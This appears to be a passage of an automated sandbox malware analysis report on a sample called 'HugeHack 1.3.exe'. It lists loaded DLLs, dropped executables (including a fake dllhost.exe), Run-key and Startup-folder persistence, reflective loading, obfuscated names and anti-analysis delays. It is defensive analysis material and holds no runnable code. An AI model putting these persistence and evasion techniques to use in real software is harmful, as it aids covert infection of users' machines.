Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: windowscodecs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\Payload.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: HugeHack 1.3.exe.bin.exe Static file information: File size 6767104 > 1048576
Source: C:\Users\user\AppData\Local\Temp\Payload.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
Source: HugeHack 1.3.exe.bin.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x672000
Source: Binary string: C:\Users\Daniel\program.pdb source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1224675944.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, webhook.exe, 00000003.00000000.1224355173.0000000000632000.00000002.00000001.01000000.00000008.sdmp

Data Obfuscation

Source: Payload.exe.0.dr, OK.cs .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, OK.cs .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: dllhost.exe.2.dr, OK.cs .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: ClickMe.exe.2.dr, OK.cs .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, OK.cs .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: c382eb151c59bd833b24120723eac541.exe.16.dr, OK.cs .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: dllhost.exe.2.dr Static PE information: real checksum: 0x0 should be: 0x115b5
Source: c382eb151c59bd833b24120723eac541.exe.16.dr Static PE information: real checksum: 0x0 should be: 0x115b5
Source: HugeHack 1.3.exe.bin.exe Static PE information: real checksum: 0xb6dd should be: 0x682a2e
Source: Payload.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x115b5
Source: webhook.exe.0.dr Static PE information: real checksum: 0x0 should be: 0xd23c1
Source: ClickMe.exe.2.dr Static PE information: real checksum: 0x0 should be: 0x115b5
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Code function: 2_2_00E829A8 pushfd ; ret 2_2_00E829EE
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Code function: 2_2_00E82CA1 pushfd ; ret 2_2_00E82D1A
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Code function: 3_2_065B5D10 push es; ret 3_2_065B5D20
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Code function: 3_2_07F92EA0 pushfd ; retf 3_2_07F92EA1
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Code function: 3_2_07F9E17F push esp; ret 3_2_07F9E193
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 5_3_15200738 push eax; ret 5_3_15200739
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 5_3_15208302 push eax; ret 5_3_152082F1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 5_3_1520BB63 push eax; ret 5_3_1520BB79
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 5_3_15204970 push eax; ret 5_3_15204971
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 5_3_15201D47 push eax; ret 5_3_15201E21
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 5_3_1520C9B8 push eax; ret 5_3_1520C9B9
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 5_3_152085F0 push eax; ret 5_3_152085F1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 5_3_1520C3F8 push eax; retf 5_3_1520C3FD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 5_3_15202BC0 push eax; ret 5_3_15202BC1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 5_3_1520ADD0 push eax; ret 5_3_1520ADD1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 5_3_151FD610 push eax; ret 5_3_151FD611
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 5_3_1520AA4C push eax; retf 5_3_1520AA4D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 5_3_151FF8BF push eax; ret 5_3_151FF999
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 5_3_152082F0 push eax; ret 5_3_152082F1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 5_3_152058F0 push eax; ret 5_3_152058F1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 5_3_152CCAA6 push esp; retf 5_3_152CCAB5
Source: 16.2.dllhost.exe.2989240.1.raw.unpack, NNHeR8bFYh2LcEWSbx.cs High entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'foONAXjG3I', 'sZWSGe5T9eymd', 'hCNSuhQpx', 'vdBMdA6DW', 'JtXWIGFkn', 'NsUOQ9nfG', 'memvMOjIl', 'qo4kGe9DR', 'n2ih4e3Jc'
Source: 16.2.dllhost.exe.a40000.0.raw.unpack, NNHeR8bFYh2LcEWSbx.cs High entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'foONAXjG3I', 'sZWSGe5T9eymd', 'hCNSuhQpx', 'vdBMdA6DW', 'JtXWIGFkn', 'NsUOQ9nfG', 'memvMOjIl', 'qo4kGe9DR', 'n2ih4e3Jc'
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe File created: C:\Users\user\AppData\Local\Temp\Payload.exe
Source: C:\Users\user\AppData\Local\Temp\Payload.exe File created: C:\Users\user\AppData\Roaming\dllhost.exe
Source: C:\Users\user\AppData\Roaming\dllhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe
Source: C:\Users\user\AppData\Local\Temp\Payload.exe File created: C:\ClickMe.exe
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe File created: C:\Users\user\AppData\Local\Temp\webhook.exe

Boot Survival

Source: C:\Users\user\AppData\Roaming\dllhost.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c382eb151c59bd833b24120723eac541
Source: C:\Users\user\AppData\Roaming\dllhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe
Source: C:\Users\user\AppData\Roaming\dllhost.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run c382eb151c59bd833b24120723eac541

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\AppData\Roaming\dllhost.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\c382eb151c59bd833b24120723eac541 f55ab6fb12b43f7934c631eabc315fb4
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Users\user\Desktop\HugeHack 1.3.exe.bin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dllhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Payload.exe, 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, Payload.exe, 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Memory allocated: 1120000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Memory allocated: 3030000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Memory allocated: 1320000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Memory allocated: 2830000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Memory allocated: 2A40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Memory allocated: 2880000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: B60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 2930000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 4930000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 1460000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 31B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 1500000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 65B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 75B0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 1550000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 35B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 55B0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 660000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 2700000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe Memory allocated: 4700000 memory commit | memory reserve | memory write watch
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 5_3_151FE91C sldt word ptr [eax] 5_3_151FE91C
Source: C:\Users\user\AppData\Local\Temp\Payload.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Thread delayed: delay time: 599828
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Thread delayed: delay time: 599685
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Thread delayed: delay time: 599484
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Thread delayed: delay time: 598672
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Thread delayed: delay time: 598297
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Thread delayed: delay time: 598026
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Thread delayed: delay time: 597797
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Thread delayed: delay time: 597503
Source: C:\Users\user\AppData\Local\Temp\webhook.exe Thread delayed: delay time: 597328
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 407
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 375
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1554
Source: C:\Users\user\AppData\Roaming\dllhost.exe Window / User API: threadDelayed 422
Source: C:\Users\user\AppData\Roaming\dllhost.exe Window / User API: threadDelayed 1009
Source: C:\Users\user\AppData\Roaming\dllhost.exe Window / User API: threadDelayed 630
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1740
Source: C:\Users\user\AppData\Local\Temp\Payload.exe TID: 7688 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Payload.exe TID: 7644 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164 Thread sleep time: -599828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164 Thread sleep time: -599685s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164 Thread sleep time: -599484s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164 Thread sleep time: -598672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164 Thread sleep time: -598297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164 Thread sleep time: -598026s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164 Thread sleep time: -597797s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164 Thread sleep time: -597503s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\webhook.exe TID: 8164 Thread sleep time: -597328s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7228 Thread sleep count: 407 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2576 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5304 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7908 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8028 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7996 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 5908 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2996 Thread sleep time: -211000s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2996 Thread sleep time: -77500s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1384 Thread sleep count: 1740 > 30
